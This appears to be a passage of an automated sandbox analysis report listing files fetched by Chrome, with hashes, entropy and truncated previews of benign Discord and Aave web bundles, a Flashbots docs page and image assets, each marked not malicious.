                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}let s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null};class d extends(i=a.ZP.PersistedStore){initialize(e){null!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusMedia(){return s.wowMomentWumpusMediaUrl}}o(d,"displayName","PurchasedItemsFestivityStore"),o(d,"persistKey","PurchasedItemsFestivityStore"),o(d,"migrations",[e=>({...e})]),t.Z=new d(c.Z,{LOGOUT:function(){s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null}},PURCHASED_ITEMS_FESTIVITY_SET_CAN_PLAY_WOW_MOMENT:functi
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14194), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):14194
                                                                                                                                                                                                                                                  Entropy (8bit):5.487452494532276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:OxvgZ4Ybcnri8/C1W7WbafAj4/1LBzVIx:4g+YoOGCz0/9BzV+
                                                                                                                                                                                                                                                  MD5:8B5F3929CA7A9C359046FF238B613A52
                                                                                                                                                                                                                                                  SHA1:503B0F39A6F5AAC01B7A300A6F2F565A0CCB6C03
                                                                                                                                                                                                                                                  SHA-256:43045AEF9B1636CBBD46B6608AC72B9C2855922FCF4C6AFFA736F0CFE53486CE
                                                                                                                                                                                                                                                  SHA-512:7F73EE8570432417E6B9971A95C6816DD1D8FCA38F1952CFDC6B23D4901155A88D36B21EC5A9151144C155FC715578EFA4A04098D5840A16E72E7B6FDB77600D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1573-e710bb2ca0646568.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:function(){return L},Pu:function(){return B}});var t=r(59499),i=r(4730),a=r(49501),o=r(80227),s=r(81645),c=r(30120),l=r(29630),d=r(91655),x=r(22841),u=r(54181),p=r(56371),j=(r(67294),r(44749)),h=r(92391),v=r(29946),f=r(96875),m=r(68682),b=r(41024),g=r(72667),y=r(35643),O=r(85893),A=["description","value","futureValue","numberPrefix","iconSymbol","loading"];function Z(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function P(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?Z(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwn
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17745)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17794
                                                                                                                                                                                                                                                  Entropy (8bit):5.474218395624201
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:knp0/xKyAhCraL7NdDN3AQJhGleqX1VXn0Fmc1YXsEPoVUAE:knpGyfLvJJgeUjD
                                                                                                                                                                                                                                                  MD5:838CFF62E72197F48B6F5B8B980842FF
                                                                                                                                                                                                                                                  SHA1:981E4F01023957A128AF323236C695C8998749F1
                                                                                                                                                                                                                                                  SHA-256:0E59DA05A21FDB5F235F2D1454A96A5427C595C90D926123943B6C7F7DA3B8D8
                                                                                                                                                                                                                                                  SHA-512:5FAD84995F93D6C3FB1B90401AE01A34B9E7CE15602706FFB3A40484654B8319B60870F6D993FC3D88DE3862ACDC1DAD7824B07B924D50E97955CEDB7BEF9B5A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,s){s(757143);var n,r=s(735250),i=s(470079),a=s(120356),o=s.n(a),l=s(593473),c=s(873546),u=s(442837),d=s(570140),h=s(893776),p=s(129293),m=s(388905),f=s(17894),C=s(124860),g=s(108427),x=s(314897),N=s(585483),v=s(981631),E=s(689938),S=s(113207);function A(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}u.ZP.initialize();class j extends(n=i.PureComponent){componentDidMount(){(0,g.e)("reset_password")}renderPasswordReset(){let{password:e,error:t,hasCancel:n}=this.state,i=this.isSubmitting(),a=null!=t?t:this.renderError("password");return(0,r.jsxs)(m.ZP,{onSubmit:this.handleSubmit,tag:"form",children:[(0,r.jsx)("img",{alt:"",src:null==a?s(26230):s(935227),className:S.marginBottom20}),(0,r.jsx
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                                  Entropy (8bit):5.114377432261608
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tcGcAumc4slmyHSORZQqFbxTmSqgBqDc4:tcGtuIyHjRZQq5sLgBqA4
                                                                                                                                                                                                                                                  MD5:CF35F935EE29ECDC14E56FAD3F87DF16
                                                                                                                                                                                                                                                  SHA1:6EE303DF7BA5468930E37DA8C09E6CBCC3CC9748
                                                                                                                                                                                                                                                  SHA-256:6CF85DA54D4C554DA07B2AEC6F0DF29603D8D28A102ED4E17DCE99A7D7D79B9A
                                                                                                                                                                                                                                                  SHA-512:EC1F0F369B42BEB670B253CFD5AD9D4C15C2DBED08C8804B2C73F19DEE0C561F2EF19D245EDFD999D6166699E04A94D72A8260BD33AD3FEBE699B14EE31889AA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50864), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):50864
                                                                                                                                                                                                                                                  Entropy (8bit):5.3522605432239265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:TjDORnGYYk6RRmDsQWFkkCCU+N+BPiYHWdcy0r51/5HIkcstelT8wO2422nDzUrZ:XwsBiB6HtMqst4Q32GDzf/jyMo
                                                                                                                                                                                                                                                  MD5:1034A0DE7FBC269CCFC9DDBA4AA147EC
                                                                                                                                                                                                                                                  SHA1:DE3DB06BD3FD7926CE07F376978E87924D0302D8
                                                                                                                                                                                                                                                  SHA-256:EB65666971304741EB5BE24D3F0A19071CB2F6B6A9D4AB8E02C5FDA397B25B85
                                                                                                                                                                                                                                                  SHA-512:4806163B04146C031B8D2AF76A58AFDE313B2D5D68308F85803BE0C5C5EC1E91B318327502863ACF17C32B552EB5FBDD4ED4D8F57AFA491875267F244998BD6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t)||(t={});for(var e=arguments.length,n=1;n<e;n++){var o=arguments[n];r(o)&&i(t,o)}return t}},9675:function(t,e,n){"use strict";const r=n(33596),i=n(21006),o=n(45294),a=n(9809),s=n(38497),c=n(86378),u=n(28181),l=n(79254),p=n(55707);function f(t,e){if(""===t)return{data:{},content:t,excerpt:"",orig:t};let n=u(t);const r=f.cache[n.content];if(!e){if(r)return n=Object.assign({},r),n.orig=r.orig,n;f.cache[n.content]=n}return function(t,e){const n=o(e),r=n.delimiters[0],a="\n"+n.delimiters[1];let c=t.content;n.language&&(t.language=n.language);const u=r.length;if(!p.startsWith(c,r,u))return s(t,n),t;if(c.charAt(u)===r.slice(-1))return t;c=c.slice(u);const d=c.length,h=f.language(c,n);h.name&&(t.language=h.name,c=c.slice(h.raw.length));let g=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17914), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17914
                                                                                                                                                                                                                                                  Entropy (8bit):5.436094018399114
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:I9b8LprlVPUyFMq4BAyS4YSfCpn6MXvIrMB4r/5Xr2U8+5k70mSpDdqAtCFXWE1v:1BfiGxhwC5B4tARFmKkJ17o
                                                                                                                                                                                                                                                  MD5:97443182BB670D5C959DDBFDE1432F53
                                                                                                                                                                                                                                                  SHA1:A3E9A77E26378F034314AF8759194075019B22F8
                                                                                                                                                                                                                                                  SHA-256:CACC70665C0AE3428A22DB452A94E1E3790C1E944D8816E1D0BCC77AD2CA198C
                                                                                                                                                                                                                                                  SHA-512:137A6F5B37CAC9B05DC2E7EC93971188E7B91C2F01A7B9E6AC90002B61221AB9565B8A7C0C9E14541AA2082DAA14E4480E61934514F8EFEFF114E89A58DF68B6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return G}});var n=r(80854),a=r(1279),i=r(62753),s=r(9144),o=r(30120),c=r(90149),u=r(56371),l=r(67294),d=r(59499),p=r(36864),f=r(49501),v=r(57609),x=r(58527),h=r(85893);function b(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function g(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?b(Object(r),!0).forEach((function(t){(0,d.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):b(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var m=function(e){var t=(0,p.Z)({},e);return(0,h.jsx)(x.G,g(g({event:{eventName:v.vh.TOOL_TIP,eventParams:{tooltip:"Gas Calc"}}},t),
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50092), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):50092
                                                                                                                                                                                                                                                  Entropy (8bit):5.443755687994656
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:taequ+Crnl/mVsBcWGtamSQhtDH8tCBxLScWpM0x7+bAtkTsRe:Qequ+Cr1mVsBcWGtamSQhtDH8tCBlScr
                                                                                                                                                                                                                                                  MD5:F9A332F0C91326C90FF9C9E82AF7EBCF
                                                                                                                                                                                                                                                  SHA1:E56FDD50703B9DAC6EB88EF066E527B2171B01F4
                                                                                                                                                                                                                                                  SHA-256:31CB0A1DAEEA9AA0F498562C2207BA9BD60235DF4DD161C8E1F8CC23F1C4D5FE
                                                                                                                                                                                                                                                  SHA-512:BA3C4EE64C2EC69C60E17E5F2B8A828E4273303B9483185FD49434279241890BE04342DC1F09B30CEC40108A48A10EA23A9E8B47908C95086A0305153127DC89
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/v3-migration-baa8f5f0ea1977d8.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4562],{96471:function(e,r,t){"use strict";var n=t(64836);r.Z=void 0;var i=n(t(64938)),s=t(85893),a=(0,i.default)((0,s.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");r.Z=a},21386:function(e,r,t){"use strict";var n=t(64836);r.Z=void 0;var i=n(t(64938)),s=t(85893),a=(0,i.default)((0,s.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");r.Z=a},65445:function(e,r,t){"use strict";var n=t(54235),i=t(85893);r.Z=(0,n.Z)((0,i.jsx)("path",{d:"M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6 1.41-1.41z"}),"KeyboardArrowDown")},78678:function(e,r,t){"use strict";var n=t(54235),i=t(85893);r.Z=(0,n.Z)((0,i.jsx)("path",{d:"M7.41 15.41 12 10.83l4.59 4.58L18 14l-6-6-6 6z"}),"KeyboardArrowUp")},73881:function(e,r,t){"use strict";t.r(r),t.d(r,{default:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (15144)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):27938
                                                                                                                                                                                                                                                  Entropy (8bit):5.273489306845726
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ILfuzoXM5W6W5zLBBm4lNXBsDsPTVwW+Dpi/dgumGxrhZNv4VzIx+Ij:ILuzWoGg4GsPhwW+Fi/Suww
                                                                                                                                                                                                                                                  MD5:BD6B6B1C91DC1A52BD3D1AAD82BD575D
                                                                                                                                                                                                                                                  SHA1:C2B65392B6781173A4413C4C8EE141F8A85667B5
                                                                                                                                                                                                                                                  SHA-256:A42CD52E8F452F345A45B96DA7D50F0C7E245424352E53060A5C07C6DA0F1345
                                                                                                                                                                                                                                                  SHA-512:9E29E67B60A37E3DE3F2E0B93D33181D57782F8CF82E0C98C352788D432CAD09BEF6E06E5FDD9F950FF39B3A1275B9450E87C640424184F6F73CBC46F2E60D19
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<!doctype html>.<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-flashbots-protect/quick-start" data-has-hydrated="false">.<head>.<meta charset="UTF-8">.<meta name="generator" content="Docusaurus v3.0.1">.<title data-rh="true">Quick Start | Flashbots Docs</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:url" content="https://docs.flashbots.net/flashbots-protect/quick-start"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (46641), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):46641
                                                                                                                                                                                                                                                  Entropy (8bit):5.469706628412611
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:cyPK6Dadwq9sGmjphCsBnyuCLcoZLHcdVS3cZJQvFLXmLbGM/VzAm2GbNX:QZkphCpHcdQdnMdX
                                                                                                                                                                                                                                                  MD5:BB1842271FE5B418C63E3EB6F030E80F
                                                                                                                                                                                                                                                  SHA1:34BC8BE1B36833E926FF95D6BCBD62585A060196
                                                                                                                                                                                                                                                  SHA-256:C80E8D5C50E720CA34EC3B170196D826987164A9C881566877E3DDA0067318FB
                                                                                                                                                                                                                                                  SHA-512:AA1218E2973D6E98E5F2B178B209E4522ACE7F9ECAFB9C2A0C95C7D523C43E3C9C1F755F0996166A370D482E06DD1350D92D2D22C8A241E1F5F6CCF0BF07FB68
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),s=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),a=r(67294),s=r(86010),i=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25421), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25421
                                                                                                                                                                                                                                                  Entropy (8bit):5.434407177604553
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:IyPmEeXYMad2bJ+GxIpi0eR2H0wUfbsrB2endNxstZLrt11slfHM:IyPfeoMasWpB0JI4ZPt11sl0
                                                                                                                                                                                                                                                  MD5:B380F675F1CF29F13F03AE90970F8677
                                                                                                                                                                                                                                                  SHA1:84F4B920331001D27F92BA933B2E72909C278A05
                                                                                                                                                                                                                                                  SHA-256:281D57BF1FDA192BB5E86A1753E4E5770B5C9CBCFE5CCF2D24577E8AF479DF54
                                                                                                                                                                                                                                                  SHA-512:DAE91423C83DE18827861701659A2B3B493591FFDE7AC61F81CCCF68DAD30589B45DE6B1F21595A5B2790449C3769AE8E17FD48DDEEEF0D348BA92E3320F8BA6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7828],{62753:function(e,r,n){var t=n(64836);r.Z=void 0;var o=t(n(64938)),i=n(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=s},89722:function(e,r,n){n.d(r,{Z:function(){return v}});var t=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),d=n(36622),u=n(34867);function p(e){return(0,u.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=n(85893);const x=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (25149), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):25149
                                                                                                                                                                                                                                                  Entropy (8bit):5.515346335535246
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:1yPm6XaPSuVecXWY/MZ0CawHJv2Vz0RXGbI:X1BezYFCaQr
                                                                                                                                                                                                                                                  MD5:2A5381EA778B8B82FB8CE2B1D87BC39F
                                                                                                                                                                                                                                                  SHA1:7A4582E891161EB0E7D61F799D9812BB0C732729
                                                                                                                                                                                                                                                  SHA-256:B6A7049D52879FD22DBA0377B59901C5D647B57773D4ECB53D97C6F3DEA343EA
                                                                                                                                                                                                                                                  SHA-512:CBEB6007A668BF8FC5ABC0DAE3490EE948A91F291A732B524ACC5D221D8D1218E412D42FA52F0E94AA22B15F1754A09181610ADED2EDEED143B4425F7FE18121
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/2992.c7b7d0c292a03716.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2992],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},89722:function(e,t,r){r.d(t,{Z:function(){return x}});var n=r(87462),o=r(63366),a=r(67294),i=r(86010),s=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7796
                                                                                                                                                                                                                                                  Entropy (8bit):7.8453773692006825
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:vi5DEcWihLh3y7h8+wPHgOcaOWPv8UaxjJuz9N9v:wy8xxaxlsf9v
                                                                                                                                                                                                                                                  MD5:9871E69B95BECCFFF5B48E42B0622F6A
                                                                                                                                                                                                                                                  SHA1:1A939C9602A3F18876132656476DFACF0A157830
                                                                                                                                                                                                                                                  SHA-256:946D87D92B748DF7666682FE022AF7231C8AFF8120572CFE322A80AF0949CCD6
                                                                                                                                                                                                                                                  SHA-512:20F23EFC4606021E80987B8E3F291AF140146931806E831FAE6B3FAD14B7E28C50D79C10831614AD3058FDF4CD47E580B6E17B2D5C32A3D176C434AC7A9C41F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:............ .^........PNG........IHDR.............\r.f....orNT..w.....IDATx.....U..+;...^^..^/i:$!aq......P4,"(.......|:.2.....@.Q..E......T..T.d.....d.s..}u_.;.~..T...}......n.{...q...................................................................................................................................................8.-[.x...."......n".w..O.....?......N...x.........7....-.w.F..............L.....$.dg.mbG..O!.E.I....KI^K....H. 9.....IN%9.......N..s.|.A.3^..L...,.......#?.,(...6A.'.1.G.=.'.<...*....H...2.kIn#....$O.<G.".+M..3...y...k.w..g8.d5Io..........>Z4..\...p>......N..=$..#...WIn$y..I...cb.Z^"yZ..FyV~..Hv..2=..9..+..;...P.P~..n.d.3I...(...$w.<.l.7cA<...J9j.@2.G..5...R...Ju..64.g.)....$.<D.B.'.X.?..r.8K.7L.aA..?.E...p.X.:.O.av.}..w.d.eA.O...;....?.R..Q..Nz:..j......'..$.<...I.#..$g..N. .|%|l.pL.Z.6.v../.'.!..&u....MrU.W....*....+WB.A..<..y.lG..q._..c.\.......B.j..Y...C."h'....~l.[..\..$..<.I.......}%6..g...!......(V,..W::.kH.>......27y...$.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7686), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7686
                                                                                                                                                                                                                                                  Entropy (8bit):5.401175716938259
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:yOvPmLqFSd7MVe5wbCenCuRx+4qQLce2OETvcZnxmu5y:ycOLqF9qw2G7x+zAafb4xG
                                                                                                                                                                                                                                                  MD5:9A4C6A7CFD9268100A8B0AB65BBE222C
                                                                                                                                                                                                                                                  SHA1:2C4C4F00A1E2DA2CC2448058260498E2DDD10D98
                                                                                                                                                                                                                                                  SHA-256:D7A5A67CE69A55AFC5182501B919B822E4B5C4BA1E015362EA7D30C53499E47B
                                                                                                                                                                                                                                                  SHA-512:E6DCC3DDB9FF159A8D84986FB2B3F7FE101A9757F023E41FC36A59EA6D6F7FE530C311850C5C07AD04FE4FBE30C93082C0D443DB1366E610AEEFC9476E11604D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7715-d9ff1ad95acbdf2d.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7715],{64288:function(e,t,n){n.d(t,{Z:function(){return v}});var i=n(63366),r=n(87462),o=n(67294),a=n(86010),s=n(28320),c=n(34867),u=n(94780),p=n(29628),d=n(13264),m=n(66500),l=n(85893);const f=["className","component","disableGutters","fixed","maxWidth","classes"],x=(0,m.Z)(),g=(0,d.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`maxWidth${(0,s.Z)(String(n.maxWidth))}`],n.fixed&&t.fixed,n.disableGutters&&t.disableGutters]}}),h=e=>(0,p.Z)({props:e,name:"MuiContainer",defaultTheme:x});var b=n(36622),w=n(81719),k=n(78884);const $=function(e={}){const{createStyledComponent:t=g,useThemeProps:n=h,componentName:p="MuiContainer"}=e,d=t((({theme:e,ownerState:t})=>(0,r.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (34035), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
